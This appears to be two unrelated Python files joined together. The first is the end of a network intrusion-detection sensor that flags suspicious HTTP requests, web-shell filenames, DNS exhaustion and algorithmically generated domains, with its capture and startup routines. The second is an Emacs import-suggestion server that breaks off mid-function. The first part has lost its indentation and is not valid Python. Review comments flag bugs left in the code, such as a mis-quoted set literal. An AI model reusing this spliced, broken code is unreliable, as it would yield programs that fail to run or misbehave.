if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
match = re.search(r"\bX-Forwarded-For:\s*([0-9.]+)".encode(), packet, re.I)
if match:
src_ip = "%s,%s" % (src_ip, match.group(1))
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.PATH, unquoted_path))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.PATH, unquoted_path)] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.POST_DATA, unquoted_post_data))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.POST_DATA, unquoted_post_data)] = found or ""
if found:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = _urllib.parse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension and extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
elif filename in WEB_SHELLS:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "potential web shell (suspicious)", "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset:offset + 1])
if not length:
query = query[:-1]
break
query += get_text(dns_data[offset + 1:offset + length + 1]) + '.'
offset += length + 1
query = query.lower()
if not query or re.search(VALID_DNS_NAME_REGEX, query) is None or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2:3]) & 0xfa == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > DAILY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = set()
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
if (sec - (_last_dns_exhaustion or 0)) > 60:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
if re.search(r"bl\b", trail) is None: # generic check for DNSBLs
if not any(_ in subdomains for _ in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
_last_dns_exhaustion = sec
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if addr_port(dst_ip, dst_port) in trails:
trail = addr_port(dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2:3]) & 0x80: # standard response
if ord(dns_data[3:4]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_:_ + 1]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails and not _check_domain_whitelisted(query):
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3:4]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
if not is_local(dst_ip): # prevent FPs caused by local queries
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec // 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec // 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
trail = "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:])
if not any(subdomain in trail for subdomain in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) == 2 and parts[0] and '-' not in parts[0]:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length:iph_length + 1]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length:iph_length + 1]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
    """
    Performs sensor initialization
    """
    global _multiprocessing
    # Multiprocessing is optional: fall back to single-process capture when
    # the module is unavailable or when configured/profiled single-process.
    try:
        import multiprocessing
        if config.PROCESS_COUNT > 1 and not config.profile:
            _multiprocessing = multiprocessing
    except (ImportError, OSError, NotImplementedError):
        pass
    def update_timer():
        # Refreshes the in-memory trails (and the combined static-trail regex)
        # and reschedules itself via threading.Timer (config.UPDATE_PERIOD).
        retries = 0
        if not config.no_updates:
            while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
                sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
                sys.stdout.flush()
                time.sleep(10)
                retries += 1
            if retries:
                print(")")
        if config.no_updates or retries == CHECK_CONNECTION_MAX_RETRIES:
            if retries == CHECK_CONNECTION_MAX_RETRIES:
                print("[x] going to continue without online update")
            _ = update_trails(offline=True)
        else:
            _ = update_trails()
            update_ipcat()
        if _:
            trails.clear()
            trails.update(_)
        elif not trails:
            _ = load_trails()
            trails.update(_)
        # Collect regex-like "static" trails into one named-group alternation.
        _regex = ""
        for trail in trails:
            if "static" in trails[trail][1]:
                if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
                    try:
                        re.compile(trail)
                    except:
                        pass
                    else:
                        if re.escape(trail) != trail:
                            index = _regex.count("(?P<g")
                            if index < 100:  # Reference: https://stackoverflow.com/questions/478458/python-regular-expressions-with-more-than-100-groups
                                _regex += "|(?P<g%s>%s)" % (index, trail)
        trails._regex = _regex.strip('|')
        thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
        thread.daemon = True
        thread.start()
    create_log_directory()
    get_error_log_handle()
    check_memory()
    msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
    if os.path.isfile(config.TRAILS_FILE):
        mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
        msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
    print(msg)
    update_timer()
    if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
        exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
    # Load user plugin scripts; each must expose plugin(event_tuple, packet).
    if config.plugins:
        config.plugin_functions = []
        for plugin in re.split(r"[,;]", config.plugins):
            plugin = plugin.strip()
            found = False
            # Accept a bare path, a name under plugins/, or plugins/<name>.py.
            for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
                if os.path.isfile(_):
                    plugin = _
                    found = True
                    break
            if not found:
                exit("[!] plugin script '%s' not found" % plugin)
            else:
                dirname, filename = os.path.split(plugin)
                dirname = os.path.abspath(dirname)
                if not os.path.exists(os.path.join(dirname, '__init__.py')):
                    exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
                if not filename.endswith(".py"):
                    exit("[!] plugin script '%s' should have an extension '.py'" % filename)
                if dirname not in sys.path:
                    sys.path.insert(0, dirname)
                try:
                    module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
                except (ImportError, SyntaxError) as msg:
                    exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
                found = False
                for name, function in inspect.getmembers(module, inspect.isfunction):
                    # NOTE(review): set(("event_tuple', 'packet")) is a set of the
                    # *characters* of a single string (note the quote placement);
                    # presumably meant set(("event_tuple", "packet")) — confirm.
                    if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
                        found = True
                        config.plugin_functions.append(function)
                        function.__name__ = module.__name__
                if not found:
                    exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
    if config.pcap_file:
        # Offline mode: read packets from the given pcap file(s).
        for _ in config.pcap_file.split(','):
            _caps.append(pcapy.open_offline(_))
    else:
        # Live mode: open every monitored interface in promiscuous mode.
        interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
        if (config.MONITOR_INTERFACE or "").lower() == "any":
            if IS_WIN or "any" not in pcapy.findalldevs():
                print("[x] virtual interface 'any' missing. Replacing it with all interface names")
                interfaces = pcapy.findalldevs()
            else:
                print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
        for interface in interfaces:
            if interface.lower() != "any" and re.sub(r"(?i)\Anetmap:", "", interface) not in pcapy.findalldevs():
                hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
                exit("[!] interface '%s' not found\n%s" % (interface, hint))
            print("[i] opening interface '%s'" % interface)
            try:
                _caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
            except (socket.error, pcapy.PcapError):
                if "permitted" in str(sys.exc_info()[1]):
                    exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
                elif "No such device" in str(sys.exc_info()[1]):
                    exit("[!] no such device '%s'" % interface)
                else:
                    raise
    if config.LOG_SERVER and ':' not in config.LOG_SERVER:
        exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
    if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
        exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
    if config.CAPTURE_FILTER:
        print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
        for _cap in _caps:
            try:
                _cap.setfilter(config.CAPTURE_FILTER)
            except:
                pass
    if _multiprocessing:
        _init_multiprocessing()
    # Best-effort CPU affinity tuning via the external 'schedtool' utility.
    if not IS_WIN and not config.DISABLE_CPU_AFFINITY:
        try:
            try:
                mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
                used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
                max_used = max(int(_, 16) for _ in used)
                affinity = max(1, (max_used << 1) % 2 ** mod)
            except:
                affinity = 1
            p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            _, stderr = p.communicate()
            # NOTE(review): under Python 3 `stderr` is bytes, so this str-in-bytes
            # membership test would raise TypeError — confirm intended runtime.
            if "not found" in stderr:
                msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
                for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
                    if _ in distro:
                        msg += " (e.g. '%s')" % install
                        break
                print(msg)
        except:
            pass
def _init_multiprocessing():
    """
    Inits worker processes used in multiprocessing mode
    """
    global _buffer
    global _n
    # Nothing to do unless multiprocessing mode was enabled in init().
    if not _multiprocessing:
        return
    print("[i] preparing capture buffer...")
    try:
        # Anonymous shared mmap used as the packet ring buffer
        # (Reference: http://www.alexonlinux.com/direct-io-in-python)
        _buffer = mmap.mmap(-1, config.CAPTURE_BUFFER)
        # Zero-fill the whole buffer chunk by chunk, then rewind.
        zero_chunk = b"\x00" * MMAP_ZFILL_CHUNK_LENGTH
        for _chunk_index in xrange(config.CAPTURE_BUFFER // MMAP_ZFILL_CHUNK_LENGTH):
            _buffer.write(zero_chunk)
        _buffer.seek(0)
    except KeyboardInterrupt:
        raise
    except:
        exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
    print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
    # Shared (unlocked) counter of written blocks, consumed by the workers.
    _n = _multiprocessing.Value('L', lock=False)
    for worker_index in xrange(config.PROCESS_COUNT - 1):
        child = _multiprocessing.Process(target=worker, name=str(worker_index), args=(_buffer, _n, worker_index, config.PROCESS_COUNT - 1, _process_packet))
        child.daemon = True
        child.start()
def monitor():
    """
    Sniffs/monitors given capturing interface
    """
    print("[o] running...")
    def packet_handler(datalink, header, packet):
        # Per-packet callback: locate the IP header offset for the datalink
        # type, then either enqueue the packet for a worker process (via the
        # shared mmap ring) or process it inline.
        global _count
        ip_offset = None
        try:
            dlt_offset = DLT_OFFSETS[datalink]
        except KeyError:
            log_error("Received unexpected datalink (%d)" % datalink, single=True)
            return
        try:
            if datalink == pcapy.DLT_RAW:
                ip_offset = dlt_offset
            elif datalink == pcapy.DLT_PPP:
                if packet[2:4] in (b"\x00\x21", b"\x00\x57"):  # (IPv4, IPv6)
                    ip_offset = dlt_offset
            elif datalink == pcapy.DLT_NULL:
                if packet[0:4] in (b"\x02\x00\x00\x00", b"\x23\x00\x00\x00"):  # (IPv4, IPv6)
                    ip_offset = dlt_offset
            elif dlt_offset >= 2:
                if packet[dlt_offset - 2:dlt_offset] == b"\x81\x00":  # VLAN
                    dlt_offset += 4
                if packet[dlt_offset - 2:dlt_offset] in (b"\x08\x00", b"\x86\xdd"):  # (IPv4, IPv6)
                    ip_offset = dlt_offset
        except IndexError:
            pass
        if ip_offset is None:
            return
        try:
            if six.PY3:  # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
                sec, usec = [int(_) for _ in ("%.6f" % time.time()).split('.')]
            else:
                sec, usec = header.getts()
            if _multiprocessing:
                # Block layout: packed (sec, usec, ip_offset) header + raw packet.
                block = struct.pack("=III", sec, usec, ip_offset) + packet
                if _locks.count:
                    _locks.count.acquire()
                write_block(_buffer, _count, block)
                _n.value = _count = _count + 1
                if _locks.count:
                    _locks.count.release()
            else:
                _process_packet(packet, sec, usec, ip_offset)
        except socket.timeout:
            pass
    try:
        def _(_cap):
            # Capture loop for one pcap handle (run in its own thread when
            # multiple interfaces/files are monitored).
            global _done_count
            datalink = _cap.datalink()
            if six.PY3 and not config.pcap_file:  # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
                def _loop_handler(header, packet):
                    packet_handler(datalink, header, packet)
                _cap.loop(-1, _loop_handler)
            else:
                while True:
                    success = False
                    try:
                        (header, packet) = _cap.next()
                        if header is not None:
                            success = True
                            packet_handler(datalink, header, packet)
                        elif config.pcap_file:
                            # End of pcap file for this handle.
                            with _done_lock:
                                _done_count += 1
                            break
                    except (pcapy.PcapError, socket.timeout):
                        pass
                    if not success:
                        time.sleep(REGULAR_SENSOR_SLEEP_TIME)
        if config.profile and len(_caps) == 1:
            print("[=] will store profiling results to '%s'..." % config.profile)
            _(_caps[0])
        else:
            if len(_caps) > 1:
                if _multiprocessing:
                    _locks.count = threading.Lock()
                _locks.connect_sec = threading.Lock()
            for _cap in _caps:
                threading.Thread(target=_, args=(_cap,)).start()
            while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
                time.sleep(1)
            print("[i] all capturing interfaces closed")
    except SystemError as ex:
        if "error return without" in str(ex):
            print("\r[x] stopping (Ctrl-C pressed)")
        else:
            raise
    except KeyboardInterrupt:
        print("\r[x] stopping (Ctrl-C pressed)")
    finally:
        print("\r[i] please wait...")
        if _multiprocessing:
            try:
                # Send one end-marker block per worker, then wait for them to drain.
                for _ in xrange(config.PROCESS_COUNT - 1):
                    write_block(_buffer, _n.value, b"", BLOCK_MARKER.END)
                    _n.value = _n.value + 1
                while _multiprocessing.active_children():
                    time.sleep(REGULAR_SENSOR_SLEEP_TIME)
            except KeyboardInterrupt:
                pass
        if config.pcap_file:
            flush_condensed_events(True)
def main():
    """
    Sensor entry point: preprocesses sys.argv, parses options, merges them
    into the global config and runs the monitor (optionally under cProfile).
    """
    # Pre-scan argv: honor -q before option parsing and fold multiple pcap
    # file arguments following -i into one comma-separated value.
    for i in xrange(1, len(sys.argv)):
        if sys.argv[i] == "-q":
            sys.stdout = open(os.devnull, 'w')
        if sys.argv[i] == "-i":
            for j in xrange(i + 2, len(sys.argv)):
                value = sys.argv[j]
                if os.path.isfile(value):
                    sys.argv[i + 1] += ",%s" % value
                    sys.argv[j] = ''
                else:
                    break
    print("%s (sensor) #v%s\n" % (NAME, VERSION))
    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
    parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
    parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
    parser.add_option("-q", dest="quiet", action="store_true", help="turn off regular output")
    parser.add_option("--console", dest="console", action="store_true", help="print events to console (Note: switch '-q' might be useful)")
    parser.add_option("--no-updates", dest="no_updates", action="store_true", help="disable (online) trail updates")
    parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
    parser.add_option("--profile", dest="profile", help=optparse.SUPPRESS_HELP)
    options, _ = parser.parse_args()
    read_config(options.config_file)
    # Command-line options override values read from the configuration file.
    for option in dir(options):
        if isinstance(getattr(options, option), (six.string_types, bool)) and not option.startswith('_'):
            config[option] = getattr(options, option)
    if options.debug:
        config.console = True
        config.PROCESS_COUNT = 1
        config.SHOW_DEBUG = True
    if options.pcap_file:
        if options.pcap_file == '-':
            print("[i] using STDIN")
        else:
            for _ in options.pcap_file.split(','):
                if not os.path.isfile(_):
                    exit("[!] missing pcap file '%s'" % _)
            print("[i] using pcap file(s) '%s'" % options.pcap_file)
    if not config.DISABLE_CHECK_SUDO and not check_sudo():
        exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
    try:
        init()
        if config.profile:
            # NOTE(review): write("") on a file opened in binary mode ("w+b")
            # raises TypeError on Python 3 — confirm the profiling path on PY3.
            open(config.profile, "w+b").write("")
            cProfile.run("monitor()", config.profile)
        else:
            monitor()
    except KeyboardInterrupt:
        print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
    # Top-level harness: run main() and translate the outcome into an exit
    # status, always terminating hard via os._exit() so daemon threads and
    # worker processes cannot keep the interpreter alive.
    show_final = True
    try:
        main()
    except SystemExit as ex:
        show_final = False
        if isinstance(get_ex_message(ex), six.string_types):
            print(get_ex_message(ex))
        os._exit(1)
    except IOError:
        # Typically a broken pipe (e.g. output piped into `head`).
        show_final = False
        log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
    except Exception:
        msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
        msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
        log_error("\n\n%s" % msg.replace("\r", ""))
        print(msg)
    finally:
        if show_final:
            print("[i] finished")
        os._exit(0)
|
importmagicserver.py | # -*- coding: utf-8 -*-
"""
importmagic.el server
---------------------
Copyright (c) 2017 Nicolás Salas V.
Licensed under GPL3. See the LICENSE file for details
"""
import sexpdata
import sys
import threading
from collections import deque
import importmagic
from epc.server import EPCServer
server = EPCServer(('localhost', 0))
# We'll follow a very passive approach. I'm not really familiar with
# neither EPC or cl-lib. So please, don't expect to see a lot of
# quality in this code
index = None
# Since the transformation from Emacs Lisp to Python causes strings to
# be lists of separate characters, we need a function that can provide
# a regular string, which is this one.
def _stringify(input_param):
return ''.join(input_param)
# Take an input parameter which is a list of lists and convert it to a
# key: value dictionary, extracting the symbol value if necessary.
def _lists_to_dict(input_param):
    """Convert a two-element list-of-lists [keys, values] into a dict.

    Symbols coming from sexpdata are unwrapped to their underlying value;
    anything that is not exactly two lists yields an empty dict.
    """
    def _unwrap(obj):
        if isinstance(obj, sexpdata.Symbol):
            return obj.value()
        return obj

    if len(input_param) != 2:  # there should only be 2 lists (keys and values)
        return {}
    keys, values = input_param
    return dict(zip([_unwrap(k) for k in keys],
                    [_unwrap(v) for v in values]))
# Construct the symbol index specified by the paths given. As the
# names suggest, these paths correspond to sys path and user_path. We
# still have to figure out if sys.path and user_path default values
# are ok.
def _build_index(sys_path=sys.path, user_path=None):
    """Build the global importmagic symbol index from the given paths.

    Accepts either a list or a single path for both parameters; user paths
    are placed before the interpreter paths.  On failure the process exits
    with status -1 (this runs inside the EPC server's worker thread).
    """
    # index is a module-level global shared with the RPC handlers.
    global index
    try:
        paths = []
        if user_path is not None:
            if isinstance(user_path, list):
                paths = paths + user_path
            else:
                paths.append(user_path)
        if isinstance(sys_path, list):
            paths = paths + sys_path
        else:
            paths.append(sys_path)
        index = importmagic.SymbolIndex()
        index.build_index(paths=paths)
    except Exception as exc:
        # A bare "except:" here also swallowed KeyboardInterrupt/SystemExit
        # and hid the cause; catch Exception and report it before bailing.
        print('Failed to build index ({})'.format(exc))
        sys.exit(-1)
# Launch a thread that builds the index.
def build_index(sys_path=sys.path, user_path=None):
    """Build the symbol index asynchronously in a daemon thread.

    Bug fix: the original passed ``args=(user_path, sys_path)``, handing each
    value to the *other* parameter of ``_build_index`` (whose signature is
    ``(sys_path, user_path)``).  Keyword arguments make the mapping explicit.
    """
    thread = threading.Thread(target=_build_index,
                              kwargs={'sys_path': sys_path, 'user_path': user_path})
    thread.daemon = True
    thread.start()
# Returns a list of every unresolved symbol in source.
@server.register_function
def get_unresolved_symbols(*source):
    """Return the list of unresolved symbols found in the given source.

    The source arrives from Emacs as a sequence of characters, hence the
    varargs signature and the initial join.
    """
    text = _stringify(source)
    scope = importmagic.Scope.from_source(text)
    unresolved, _unreferenced = scope.find_unresolved_and_unreferenced_symbols()
    return list(unresolved)
# Returns a list of candidates that can import the queried symbol. The
# returned list is ordered by score, meaning that the first element is
# more likely to be appropriate.
@server.register_function
def get_candidates_for_symbol(*symbol):
    """Return import statements that could provide *symbol*, best match first.

    Ordering follows index.symbol_scores(); a plain list replaces the
    original deque, which was only ever appended to and then converted.
    """
    name = _stringify(symbol)
    candidates = []
    for _score, module, variable in index.symbol_scores(name):
        if variable is None:
            candidates.append('import {}'.format(str(module)))
        else:
            candidates.append('from {} import {}'.format(str(module), str(variable)))
    return candidates
# Takes a list where the firest element is the source file as a string
# (assuming the call is from elisp) and the second element is the
# chosen import statement.
@server.register_function
def get_import_statement(source, import_statement, style):
    """Apply *import_statement* to *source*'s import block.

    Supports both "import <module>" and "from <module> import <names>" forms;
    *style* is a two-list key/value structure forwarded to Imports.set_style().
    Returns [start, end, new_statement] as produced by Imports.get_update().
    """
    style = _lists_to_dict(style)
    imports = importmagic.importer.Imports(index, source)
    if style:
        imports.set_style(**style)
    if import_statement.startswith('import '):
        imports.add_import(import_statement[7:])
    else:
        # "from <module> import <names>" form.  Only slice once we know the
        # separator exists — the original computed module=...[5:separator]
        # unconditionally, slicing with -1 for malformed statements.
        separator = import_statement.find(' import ')
        if separator >= 0:
            module = import_statement[5:separator]
            names = import_statement[(separator + 8):]
            imports.add_import_from(module, names)
        # else: malformed statement — leave imports untouched, mirroring the
        # original silent-skip behaviour.
    start, end, new_statement = imports.get_update()
